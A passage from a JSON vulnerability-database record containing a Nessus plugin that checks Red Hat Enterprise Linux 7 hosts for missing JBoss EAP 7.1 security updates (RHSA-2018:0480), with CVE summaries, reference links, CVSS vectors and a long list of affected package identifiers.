"CVE-2018-5968"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-cli", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-commons", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-core-client", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-dto", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-hornetq-protocol", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-hqclient-protocol", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jdbc-store", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jms-client", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jms-server", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-journal", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-native", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-ra", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-selector", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-server", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-service-extensions", "p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf", "p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf-rt", "p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf-services", "p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf-tools", "p-cpe:/a:redhat:enterprise_linux:eap7-glassfish-jsf", "p-cpe:/a:redhat:enterprise_linux:eap7-hibernate", "p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-core", "p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-entitymanager", "p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-envers", "p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-infinispan", "p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-java8", "p-cpe:/a:redhat:enterprise_linux:eap7-infinispan", "p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-cachestore-jdbc", "p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-cachestore-remote", "p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-client-hotrod", "p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-commons", "p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-core", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-api", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-impl", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-spi", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-core-api", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-core-impl", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-deployers-common", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-jdbc", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-validator", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-annotations", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-core", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-databind", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-datatype-jdk8", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-datatype-jsr310", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-jaxrs-base", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-jaxrs-json-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-module-jaxb-annotations", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-modules-java8", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-logmanager", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-cli", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-core", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap6.4", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap6.4-to-eap7.0", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap6.4-to-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap7.0", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap7.0-to-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.0", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.0-to-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.1-to-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly8.2", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly8.2-to-eap7.0", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly8.2-to-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly9.0", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly9.0-to-eap7.0", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly9.0-to-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jbossws-cxf", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-compensations", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jbosstxbridge", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jbossxts", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jts-idlj", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jts-integration", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-api", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-bridge", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-integration", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-util", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-txframework", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-api", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-bindings", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-common", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-config", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-idm-api", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-idm-impl", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-idm-simple-schema", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-impl", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-wildfly8", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-atom-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-cdi", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-client", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-crypto", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jackson-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jackson2-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jaxb-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jaxrs", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jettison-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jose-jwt", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jsapi", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-json-p-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-multipart-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-spring", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-validator-provider-11", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-yaml-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-undertow", "p-cpe:/a:redhat:enterprise_linux:eap7-undertow-jastow", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-elytron", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-client-common", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-ejb-client", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-naming-client", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-transaction-client", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-javadocs", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-modules", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-bindings", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-policy", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-common", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-dom", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-policy-stax", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-stax", "p-cpe:/a:redhat:enterprise_linux:eap7-xml-security", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2018-0480.NASL", "href": "https://www.tenable.com/plugins/nessus/108324", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:0480. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108324);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:44\");\n\n script_cve_id(\"CVE-2017-12174\", \"CVE-2017-12196\", \"CVE-2017-15089\", \"CVE-2017-15095\", \"CVE-2017-17485\", \"CVE-2017-7561\", \"CVE-2018-1048\", \"CVE-2018-5968\");\n script_xref(name:\"RHSA\", value:\"2018:0480\");\n\n script_name(english:\"RHEL 7 : JBoss EAP (RHSA-2018:0480)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Enterprise Application\nPlatform 7.1 for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform is a platform for Java\napplications based on the JBoss Application Server.\n\nThis release of Red Hat JBoss Enterprise Application Platform 7.1.1\nserves as a replacement for Red Hat JBoss Enterprise Application\nPlatform 7.1.0, and includes bug fixes and enhancements, which are\ndocumented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* artemis/hornetq: memory exhaustion via UDP and JGroups discovery\n(CVE-2017-12174)\n\n* infinispan: Unsafe deserialization of malicious object injected into\ndata cache (CVE-2017-15089)\n\n* jackson-databind: Unsafe deserialization due to incomplete black\nlist (incomplete fix for CVE-2017-7525) (CVE-2017-15095)\n\n* jackson-databind: Unsafe deserialization due to incomplete black\nlist (incomplete fix for CVE-2017-15095) (CVE-2017-17485)\n\n* resteasy: Vary header not added by CORS filter leading to cache\npoisoning (CVE-2017-7561)\n\n* undertow: Client can use bogus uri in Digest authentication\n(CVE-2017-12196)\n\n* undertow: ALLOW_ENCODED_SLASH option not taken into account in the\nAjpRequestParser (CVE-2018-1048)\n\n* jackson-databind: unsafe deserialization due to incomplete blacklist\n(incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-us/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:0480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-7561\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-12174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-12196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-17485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-1048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5968\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-core-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-dto\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-hornetq-protocol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-hqclient-protocol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jdbc-store\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jms-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jms-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-journal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-ra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-selector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-service-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf-services\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-glassfish-jsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-envers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-infinispan\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-java8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-infinispan\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-cachestore-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-cachestore-remote\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-client-hotrod\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-core-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-core-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-deployers-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-validator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-databind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-datatype-jdk8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-datatype-jsr310\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-jaxrs-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-jaxrs-json-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-module-jaxb-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-modules-java8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap6.4-to-eap7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap6.4-to-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap7.0-to-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.0-to-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.1-to-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly8.2-to-eap7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly8.2-to-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly9.0-to-eap7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly9.0-to-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jbossws-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-compensations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jbosstxbridge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jbossxts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jts-idlj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jts-integration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-bridge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-integration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-txframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-idm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-idm-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-idm-simple-schema\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-wildfly8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-atom-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-cdi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-crypto\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jackson-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jackson2-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jaxb-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jaxrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jettison-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jose-jwt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jsapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-json-p-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-multipart-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-spring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-validator-provider-11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-yaml-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-undertow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-undertow-jastow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-elytron\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-client-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-ejb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-naming-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-transaction-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-javadocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-policy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-policy-stax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-stax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-xml-security\");\n script_set_attribute(attribute:\"cpe\", 